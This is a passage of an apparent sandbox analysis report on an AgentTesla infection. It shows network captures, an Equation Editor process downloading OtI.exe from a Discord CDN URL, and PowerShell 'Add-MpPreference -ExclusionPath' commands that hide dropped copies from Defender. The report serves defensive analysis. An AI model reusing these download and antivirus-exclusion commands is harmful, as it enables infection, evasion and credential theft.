                                                      May 27, 2021 21:42:24.888417006 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888426065 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888441086 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888463974 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888484001 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888485909 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888510942 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888526917 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888537884 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888562918 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888572931 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888590097 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888616085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888631105 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888633013 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888648033 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888664007 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888664007 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888679981 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888695002 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888695955 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888711929 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888726950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888734102 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888746023 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888757944 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888763905 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888778925 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888794899 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888796091 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888809919 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888824940 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888833046 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888840914 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888856888 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888860941 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888876915 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888890982 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.888892889 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888911963 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.888927937 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889209986 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889233112 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889254093 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889254093 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889277935 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889286041 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889302969 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889323950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889338017 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889345884 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889368057 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889375925 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889386892 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889403105 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889417887 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889417887 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889434099 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889452934 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889453888 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889470100 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889482021 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.889484882 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.889516115 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.909161091 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:26.418021917 CEST4916780192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:26.418401957 CEST49168443192.168.2.22162.159.130.233

                                                      UDP Packets

                                                      Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                      May 27, 2021 21:42:23.764784098 CEST  52197        53         192.168.2.22  8.8.8.8
                                                      May 27, 2021 21:42:23.827925920 CEST  53           52197      8.8.8.8       192.168.2.22
                                                      May 27, 2021 21:42:23.849973917 CEST  53099        53         192.168.2.22  8.8.8.8
                                                      May 27, 2021 21:42:23.913418055 CEST  53           53099      8.8.8.8       192.168.2.22

                                                      DNS Queries

                                                      Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class
                                                      May 27, 2021 21:42:23.764784098 CEST  192.168.2.22  8.8.8.8  0x8766    Standard query (0)  cdn.discordapp.com  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.849973917 CEST  192.168.2.22  8.8.8.8  0x4177    Standard query (0)  cdn.discordapp.com  A (IP address)  IN (0x0001)

                                                      DNS Answers

                                                      Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address          Type            Class
                                                      May 27, 2021 21:42:23.827925920 CEST  8.8.8.8    192.168.2.22  0x8766    No error (0)  cdn.discordapp.com         162.159.130.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST  8.8.8.8    192.168.2.22  0x8766    No error (0)  cdn.discordapp.com         162.159.134.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST  8.8.8.8    192.168.2.22  0x8766    No error (0)  cdn.discordapp.com         162.159.129.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST  8.8.8.8    192.168.2.22  0x8766    No error (0)  cdn.discordapp.com         162.159.135.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.827925920 CEST  8.8.8.8    192.168.2.22  0x8766    No error (0)  cdn.discordapp.com         162.159.133.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST  8.8.8.8    192.168.2.22  0x4177    No error (0)  cdn.discordapp.com         162.159.129.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST  8.8.8.8    192.168.2.22  0x4177    No error (0)  cdn.discordapp.com         162.159.130.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST  8.8.8.8    192.168.2.22  0x4177    No error (0)  cdn.discordapp.com         162.159.133.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST  8.8.8.8    192.168.2.22  0x4177    No error (0)  cdn.discordapp.com         162.159.134.233  A (IP address)  IN (0x0001)
                                                      May 27, 2021 21:42:23.913418055 CEST  8.8.8.8    192.168.2.22  0x4177    No error (0)  cdn.discordapp.com         162.159.135.233  A (IP address)  IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                      HTTP Packets

                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
                                                      0           192.168.2.22  49167        162.159.130.233  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Timestamp                             kBytes transferred  Direction  Data
                                                      May 27, 2021 21:42:23.956628084 CEST  0                   OUT        GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Host: cdn.discordapp.com
                                                      May 27, 2021 21:42:24.015337944 CEST  1                   IN         HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 27 May 2021 19:42:24 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=3600
                                                      Expires: Thu, 27 May 2021 20:42:24 GMT
                                                      Location: https://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      cf-request-id: 0a50f284f500002c016c8eb000000001
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6zVpDszxQSru3%2F%2Fgi6JYE5%2B%2FE%2Fu5y3lGj156NtaqWDTurgayB1BvGK1bFxXVNCvDibKfV8Qr%2BFAvxFwofepvVUWfwemhIK9vxqNRHIjc%2FYJD44zYYQNVGsksDiYo%2BAE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6561b9e7eef02c01-FRA
                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      May 27, 2021 21:42:24.263251066 CEST  6                   IN         HTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 27 May 2021 19:42:24 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=3600
                                                      Expires: Thu, 27 May 2021 20:42:24 GMT
                                                      Location: https://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      cf-request-id: 0a50f284f500002c016c8eb000000001
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6zVpDszxQSru3%2F%2Fgi6JYE5%2B%2FE%2Fu5y3lGj156NtaqWDTurgayB1BvGK1bFxXVNCvDibKfV8Qr%2BFAvxFwofepvVUWfwemhIK9vxqNRHIjc%2FYJD44zYYQNVGsksDiYo%2BAE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6561b9e7eef02c01-FRA
                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      HTTPS Packets

                                                      Timestamp: May 27, 2021 21:42:24.122585058 CEST
                                                      Source IP: 162.159.130.233
                                                      Source Port: 443
                                                      Dest IP: 192.168.2.22
                                                      Dest Port: 49168
                                                      JA3 SSL Client Fingerprint: 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0
                                                      JA3 SSL Client Digest: 05af1f5ca1b87cc9cc9b25185115607d
                                                      Certificate chain:
                                                      • Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
                                                        Issuer: CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US
                                                        Not Before: Tue Jan 19 01:00:00 CET 2021
                                                        Not After: Wed Jan 19 00:59:59 CET 2022
                                                      • Subject: CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US
                                                        Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
                                                        Not Before: Mon Jan 27 13:46:39 CET 2020
                                                        Not After: Wed Jan 01 00:59:59 CET 2025

                                                      System Behavior

                                                      General

                                                      Start time:21:42:35
                                                      Start date:27/05/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                      Imagebase:0x13fc60000
                                                      File size:1424032 bytes
                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:36
                                                      Start date:27/05/2021
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:38
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low

                                                      General

                                                      Start time:21:42:43
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:43
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:44
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:44
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:47
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low

                                                      General

                                                      Start time:21:42:48
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:49
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:49
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:21:42:53
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, Author: Joe Security

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Start time:21:42:59
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:01
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:02
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:06
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Start time:21:43:03
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:04
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:04
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:21:43:06
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                                                      Imagebase:0x70000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML

                                                      General

                                                      Start time:21:43:12
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
